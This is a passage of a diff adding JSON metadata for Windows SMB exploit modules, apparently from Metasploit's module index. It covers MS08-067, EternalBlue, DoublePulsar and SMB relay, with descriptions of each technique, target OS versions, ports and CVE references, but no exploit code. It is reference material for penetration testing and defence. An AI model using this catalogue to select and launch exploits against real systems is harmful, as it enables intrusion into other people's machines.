This specific vulnerability is in the nwapi32.dll module.", + "references": [ + "CVE-2006-4688", + "OSVDB-30260", + "BID-21023", + "MSB-MS06-066" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_066_nwwks.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_066_nwwks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_070_wkssvc": { + "name": "MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow", + "fullname": "exploit/windows/smb/ms06_070_wkssvc", + "aliases": [], + "rank": 0, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n In order to exploit this vulnerability, you must specify the name of a\n valid Windows DOMAIN. It may be possible to satisfy this condition by using\n a custom DNS and LDAP setup, however that method is not covered here.\n\n Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n credentials are required to reach the vulnerable code. Windows XP SP1 only\n requires valid user credentials. 
Also, testing shows that a machine already\n joined to a domain is not exploitable.", + "references": [ + "CVE-2006-4691", + "OSVDB-30263", + "BID-20985", + "MSB-MS06-070" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targetting", + "Windows 2000 SP4", + "Windows XP SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_070_wkssvc.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_070_wkssvc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms07_029_msdns_zonename": { + "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)", + "fullname": "exploit/windows/smb/ms07_029_msdns_zonename", + "aliases": [], + "rank": 0, + "disclosure_date": "2007-04-12", + "type": "exploit", + "author": [ + "hdm ", + "Unknown", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2. This module exploits the\n RPC service using the \\DNSSERVER pipe available via SMB. 
This\n pipe requires a valid user account to access, so the SMBUSER\n and SMBPASS options must be specified.", + "references": [ + "CVE-2007-1748", + "OSVDB-34100", + "MSB-MS07-029" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", + "Windows 2000 Server SP0-SP4+ English", + "Windows 2000 Server SP0-SP4+ French", + "Windows 2000 Server SP0-SP4+ German", + "Windows 2000 Server SP0-SP4+ Italian", + "Windows 2000 Server SP0-SP4+ Polish", + "Windows 2000 Server SP0-SP4+ Portuguese", + "Windows 2000 Server SP0-SP4+ Korean", + "Windows 2000 Server SP0-SP4+ Russian", + "Windows 2000 Server SP0-SP4+ Simplified Chinese", + "Windows 2000 Server SP0-SP4+ Spanish", + "Windows 2000 Server SP0-SP4+ Swedish", + "Windows 2000 Server SP0-SP4+ Traditional Chinese", + "Windows 2000 Server SP0-SP4+ Turkish", + "Windows 2003 Server SP0 English", + "Windows 2003 Server SP0 French", + "Windows 2003 Server SP1-SP2 English", + "Windows 2003 Server SP1-SP2 French", + "Windows 2003 Server SP1-SP2 Spanish", + "Windows 2003 Server SP1-SP2 Italian", + "Windows 2003 Server SP1-SP2 German", + "Windows 2003 Server SP1-SP2 Russian", + "Windows 2003 Server SP1-SP2 Simplified Chinese" + ], + "mod_time": "2021-11-30 07:38:08 +0000", + "path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms07_029_msdns_zonename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms08_067_netapi": { + "name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption", + "fullname": "exploit/windows/smb/ms08_067_netapi", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-10-28", + "type": "exploit", + "author": [ + "hdm ", + "Brett Moore ", + "frank2 
", + "jduck " + ], + "description": "This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.", + "references": [ + "CVE-2008-4250", + "OSVDB-49243", + "MSB-MS08-067", + "URL-https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targeting", + "Windows 2000 Universal", + "Windows XP SP0/SP1 Universal", + "Windows 2003 SP0 Universal", + "Windows XP SP2 English (AlwaysOn NX)", + "Windows XP SP2 English (NX)", + "Windows XP SP3 English (AlwaysOn NX)", + "Windows XP SP3 English (NX)", + "Windows XP SP2 Arabic (NX)", + "Windows XP SP2 Chinese - Traditional / Taiwan (NX)", + "Windows XP SP2 Chinese - Simplified (NX)", + "Windows XP SP2 Chinese - Traditional (NX)", + "Windows XP SP2 Czech (NX)", + "Windows XP SP2 Danish (NX)", + "Windows XP SP2 German (NX)", + "Windows XP SP2 Greek (NX)", + "Windows XP SP2 Spanish (NX)", + "Windows XP SP2 Finnish (NX)", + "Windows XP SP2 French (NX)", + "Windows XP SP2 Hebrew (NX)", + "Windows XP SP2 Hungarian (NX)", + "Windows XP SP2 Italian (NX)", + "Windows XP SP2 Japanese (NX)", + "Windows XP SP2 Korean (NX)", + "Windows XP SP2 Dutch (NX)", + "Windows XP SP2 Norwegian (NX)", + "Windows XP SP2 Polish (NX)", + "Windows XP SP2 Portuguese - Brazilian (NX)", + "Windows XP 
SP2 Portuguese (NX)", + "Windows XP SP2 Russian (NX)", + "Windows XP SP2 Swedish (NX)", + "Windows XP SP2 Turkish (NX)", + "Windows XP SP3 Arabic (NX)", + "Windows XP SP3 Chinese - Traditional / Taiwan (NX)", + "Windows XP SP3 Chinese - Simplified (NX)", + "Windows XP SP3 Chinese - Traditional (NX)", + "Windows XP SP3 Czech (NX)", + "Windows XP SP3 Danish (NX)", + "Windows XP SP3 German (NX)", + "Windows XP SP3 Greek (NX)", + "Windows XP SP3 Spanish (NX)", + "Windows XP SP3 Finnish (NX)", + "Windows XP SP3 French (NX)", + "Windows XP SP3 Hebrew (NX)", + "Windows XP SP3 Hungarian (NX)", + "Windows XP SP3 Italian (NX)", + "Windows XP SP3 Japanese (NX)", + "Windows XP SP3 Korean (NX)", + "Windows XP SP3 Dutch (NX)", + "Windows XP SP3 Norwegian (NX)", + "Windows XP SP3 Polish (NX)", + "Windows XP SP3 Portuguese - Brazilian (NX)", + "Windows XP SP3 Portuguese (NX)", + "Windows XP SP3 Russian (NX)", + "Windows XP SP3 Swedish (NX)", + "Windows XP SP3 Turkish (NX)", + "Windows 2003 SP1 English (NO NX)", + "Windows 2003 SP1 English (NX)", + "Windows 2003 SP1 Japanese (NO NX)", + "Windows 2003 SP1 Spanish (NO NX)", + "Windows 2003 SP1 Spanish (NX)", + "Windows 2003 SP1 French (NO NX)", + "Windows 2003 SP1 French (NX)", + "Windows 2003 SP2 English (NO NX)", + "Windows 2003 SP2 English (NX)", + "Windows 2003 SP2 German (NO NX)", + "Windows 2003 SP2 German (NX)", + "Windows 2003 SP2 Portuguese (NX)", + "Windows 2003 SP2 Portuguese - Brazilian (NX)", + "Windows 2003 SP2 Spanish (NO NX)", + "Windows 2003 SP2 Spanish (NX)", + "Windows 2003 SP2 Japanese (NO NX)", + "Windows 2003 SP2 French (NO NX)", + "Windows 2003 SP2 French (NX)", + "Windows 2003 SP2 Chinese - Simplified (NX)", + "Windows 2003 SP2 Czech (NX)", + "Windows 2003 SP2 Dutch (NX)", + "Windows 2003 SP2 Hungarian (NX)", + "Windows 2003 SP2 Italian (NX)", + "Windows 2003 SP2 Russian (NX)", + "Windows 2003 SP2 Swedish (NX)", + "Windows 2003 SP2 Turkish (NX)" + ], + "mod_time": "2023-07-10 16:54:42 +0000", + "path": 
"/modules/exploits/windows/smb/ms08_067_netapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms08_067_netapi", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms09_050_smb2_negotiate_func_index": { + "name": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", + "fullname": "exploit/windows/smb/ms09_050_smb2_negotiate_func_index", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-09-07", + "type": "exploit", + "author": [ + "Laurent Gaffie ", + "hdm ", + "sf " + ], + "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.", + "references": [ + "MSB-MS09-050", + "CVE-2009-3103", + "BID-36299", + "OSVDB-57799", + "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows Vista SP1/SP2 and Server 2008 (x86)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms10_046_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/smb/ms10_046_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-07-16", + "type": "exploit", + "author": [ + "hdm ", + 
"jduck ", + "B_H" + ], + "description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.", + "references": [ + "CVE-2010-2568", + "OSVDB-66387", + "MSB-MS10-046", + "URL-https://github.com/rapid7/metasploit-framework/pull/4911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms10_046_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms10_061_spoolss": { + "name": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability", + "fullname": "exploit/windows/smb/ms10_061_spoolss", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-09-14", + "type": "exploit", + "author": [ + "jduck ", + "hdm " + ], + "description": "This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. 
This directory (Wbem\\Mof)\n is periodically scanned and any new .mof files are processed automatically. This is\n the same technique employed by the Stuxnet code found in the wild.", + "references": [ + "OSVDB-67988", + "CVE-2010-2729", + "MSB-MS10-061" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2025-04-04 11:55:57 +0000", + "path": "/modules/exploits/windows/smb/ms10_061_spoolss.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms10_061_spoolss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms15_020_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/smb/ms15_020_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-10", + "type": "exploit", + "author": [ + "Michael Heerklotz", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This creates an SMB resource to provide the payload and the trigger, and generates a\n LNK file which must be sent to the target. 
This module has been tested successfully on\n Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", + "references": [ + "CVE-2015-0096", + "MSB-MS15-020", + "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", + "URL-https://github.com/rapid7/metasploit-framework/pull/4911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms15_020_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms17_010_eternalblue": { + "name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", + "fullname": "exploit/windows/smb/ms17_010_eternalblue", + "aliases": [ + "exploit/windows/smb/ms17_010_eternalblue_win8" + ], + "rank": 200, + "disclosure_date": "2017-03-14", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "sleepya", + "Sean Dillon ", + "Dylan Davis ", + "thelightcosine", + "wvu ", + "agalway-r7", + "cdelafuente-r7", + "cdelafuente-r7", + "agalway-r7" + ], + "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. 
Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0144", + "CVE-2017-0145", + "CVE-2017-0146", + "CVE-2017-0147", + "CVE-2017-0148", + "URL-https://github.com/RiskSense-Ops/MS17-010", + "URL-https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf", + "EDB-42030" + ], + "platform": "Windows", + "arch": "x64", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Target", + "Windows 7", + "Windows Embedded Standard 7", + "Windows Server 2008 R2", + "Windows 8", + "Windows 8.1", + "Windows Server 2012", + "Windows 10 Pro", + "Windows 10 Enterprise Evaluation" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms17_010_eternalblue", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ETERNALBLUE" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms17_010_psexec": { + "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", + "fullname": "exploit/windows/smb/ms17_010_psexec", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-14", + "type": "exploit", + "author": [ + "sleepya", + 
"zerosum0x0", + "Shadow Brokers", + "Equation Group" + ], + "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0146", + "CVE-2017-0147", + "URL-https://github.com/worawit/MS17-010", + "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", + "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "PowerShell", + "Native upload", + "MOF upload" + ], + "mod_time": "2021-06-03 11:43:09 +0000", + "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms17_010_psexec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "ETERNALSYNERGY", + "ETERNALROMANCE", + "ETERNALCHAMPION", + "ETERNALBLUE" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/netidentity_xtierrpcpipe": { + "name": "Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow", + "fullname": "exploit/windows/smb/netidentity_xtierrpcpipe", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-04-06", + "type": "exploit", + "author": [ + "MC ", + "Ruben Santamarta" + ], + "description": "This module exploits a stack buffer 
overflow in Novell's NetIdentity Agent. When sending\n a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n able to execute arbitrary code. The success of this module is much greater once the\n service has been restarted.", + "references": [ + "CVE-2009-1350", + "OSVDB-53351", + "BID-34400", + "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 / Windows XP / Windows 2003" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb", + "is_install_path": true, + "ref_name": "windows/smb/netidentity_xtierrpcpipe", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/psexec": { + "name": "Microsoft Windows Authenticated User Code Execution", + "fullname": "exploit/windows/smb/psexec", + "aliases": [], + "rank": 0, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "hdm ", + "Royce Davis ", + "RageLtMan " + ], + "description": "This module uses a valid administrator username and password (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" utility provided by SysInternals. This module is now able\n to clean up after itself. 
The service created by this tool uses a randomly\n chosen name and description.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106", + "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx", + "URL-https://www.optiv.com/blog/owning-computers-without-shell-access", + "URL-http://sourceforge.net/projects/smbexec/" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "PowerShell", + "Native upload", + "MOF upload", + "Command" + ], + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/exploits/windows/smb/psexec.rb", + "is_install_path": true, + "ref_name": "windows/smb/psexec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/smb/smb_delivery": { + "name": "SMB Delivery", + "fullname": "exploit/windows/smb/smb_delivery", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-07-26", + "type": "exploit", + "author": [ + "Andrew Smith", + "Russel Van Tuyl" + ], + "description": "This module serves payloads via an SMB server and provides commands to retrieve\n and execute the generated payloads. 
Currently supports DLLs and Powershell.", + "references": [ + "URL-https://github.com/rapid7/metasploit-framework/pull/3074" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DLL", + "PSH" + ], + "mod_time": "2022-05-11 12:40:43 +0000", + "path": "/modules/exploits/windows/smb/smb_delivery.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_delivery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/smb_doublepulsar_rce": { + "name": "SMB DOUBLEPULSAR Remote Code Execution", + "fullname": "exploit/windows/smb/smb_doublepulsar_rce", + "aliases": [ + "exploit/windows/smb/doublepulsar_rce" + ], + "rank": 500, + "disclosure_date": "2017-04-14", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "zerosum0x0", + "Luke Jennings", + "wvu ", + "Jacob Robles" + ], + "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0144", + "CVE-2017-0145", + "CVE-2017-0146", + "CVE-2017-0147", + "CVE-2017-0148", + "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", + "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", + "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", + "URL-https://github.com/countercept/doublepulsar-detection-script", + "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor", + "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1" + ], + "platform": "Windows", 
+ "arch": "x64", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Execute payload (x64)", + "Neutralize implant" + ], + "mod_time": "2023-09-15 16:40:22 +0000", + "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_doublepulsar_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "DOUBLEPULSAR" + ], + "RelatedModules": [ + "auxiliary/scanner/smb/smb_ms17_010", + "exploit/windows/smb/ms17_010_eternalblue" + ], + "Stability": [ + "crash-os-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/smb_relay": { + "name": "MS08-068 Microsoft Windows SMB Relay Code Execution", + "fullname": "exploit/windows/smb/smb_relay", + "aliases": [], + "rank": 600, + "disclosure_date": "2001-03-31", + "type": "exploit", + "author": [ + "hdm ", + "juan vazquez ", + "agalway-r7", + "alanfoster", + "Spencer McIntyre" + ], + "description": "This module will relay SMB authentication requests to another\n host, gaining access to an authenticated SMB session if successful.\n If the connecting user is an administrator and network logins are\n allowed to the target machine, this module will execute an arbitrary\n payload. To exploit this, the target system\tmust try to\tauthenticate\n to this module. The easiest way to force a SMB authentication attempt\n is by embedding a UNC path (\\SERVER\\SHARE) into a web page or\n email message. When the victim views the web page or email, their\n system will automatically connect to the server specified in the UNC\n share (the IP address of the system running this module) and attempt\n to authenticate. Unfortunately, this\n module is not able to clean up after itself. 
The service and payload\n file listed in the output will need to be manually removed after access\n has been gained. The service created by this tool uses a randomly chosen\n name and description, so the services list can become cluttered after\n repeated exploitation.\n\n The SMB authentication relay attack was first reported by Sir Dystic on\n March 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n includes a patch which prevents the relaying of challenge keys back to\n the host which issued them, preventing this exploit from working in\n the default configuration. It is still possible to set the SMBHOST\n parameter to a third-party host that the victim is authorized to access,\n but the \"reflection\" attack has been effectively broken.\n\n As of Feb 2022 - this module does not support SMB 1.", + "references": [ + "CVE-2008-4037", + "OSVDB-49736", + "MSB-MS08-068", + "URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx", + "URL-https://en.wikipedia.org/wiki/SMBRelay", + "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "PowerShell", + "Native upload", + "MOF upload", + "Command" + ], + "mod_time": "2024-11-12 09:14:51 +0000", + "path": "/modules/exploits/windows/smb/smb_relay.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_relay", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "account-lockouts" + ] + }, + "session_types": false, + "needs_cleanup": null, + "actions": [ + { + "name": "CREATE_SMB_SESSION", + "description": "Do not close the SMB 
connection after relaying, and instead create an SMB session" + }, + { + "name": "PSEXEC", + "description": "Use the SMB Connection to run the exploit/windows/psexec module against the relay target" + } + ] + }, + "exploit_windows/smb/smb_rras_erraticgopher": { + "name": "Microsoft Windows RRAS Service MIBEntryGet Overflow", + "fullname": "exploit/windows/smb/smb_rras_erraticgopher", + "aliases": [], + "rank": 200, + "disclosure_date": "2017-06-13", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "Víctor Portal", + "bcoles " + ], + "description": "This module exploits an overflow in the Windows Routing and Remote\n Access Service (RRAS) to execute code as SYSTEM.\n\n The RRAS DCERPC endpoint is accessible to unauthenticated users via\n SMBv1 browser named pipe on Windows Server 2003 and Windows XP hosts;\n however, this module targets Windows Server 2003 only.\n\n Since the service is hosted inside svchost.exe, a failed exploit\n attempt can cause other system services to fail as well.\n\n The module has been successfully tested on:\n\n Windows Server 2003 SP0 (x86);\n Windows Server 2003 SP1 (x86);\n Windows Server 2003 SP2 (x86); and\n Windows Server 2003 R2 SP2 (x86).", + "references": [ + "CVE-2017-8461", + "CWE-119", + "BID-99012", + "EDB-41929", + "PACKETSTORM-147593", + "URL-https://www.securitytracker.com/id/1038701", + "URL-https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/master/windows/exploits/Erraticgopher-1.0.1.0.xml", + "URL-https://support.microsoft.com/en-us/topic/microsoft-security-advisory-4025685-guidance-for-older-platforms-june-13-2017-05151e8a-bd7f-f769-43df-38d2c24f96cd", + "URL-https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa374540(v=vs.85)", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/ebc5c709-36d8-4520-a0ac-6f36d2d6c0b2", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/5dca234b-bea4-4e67-958e-5459a32a7b71", + 
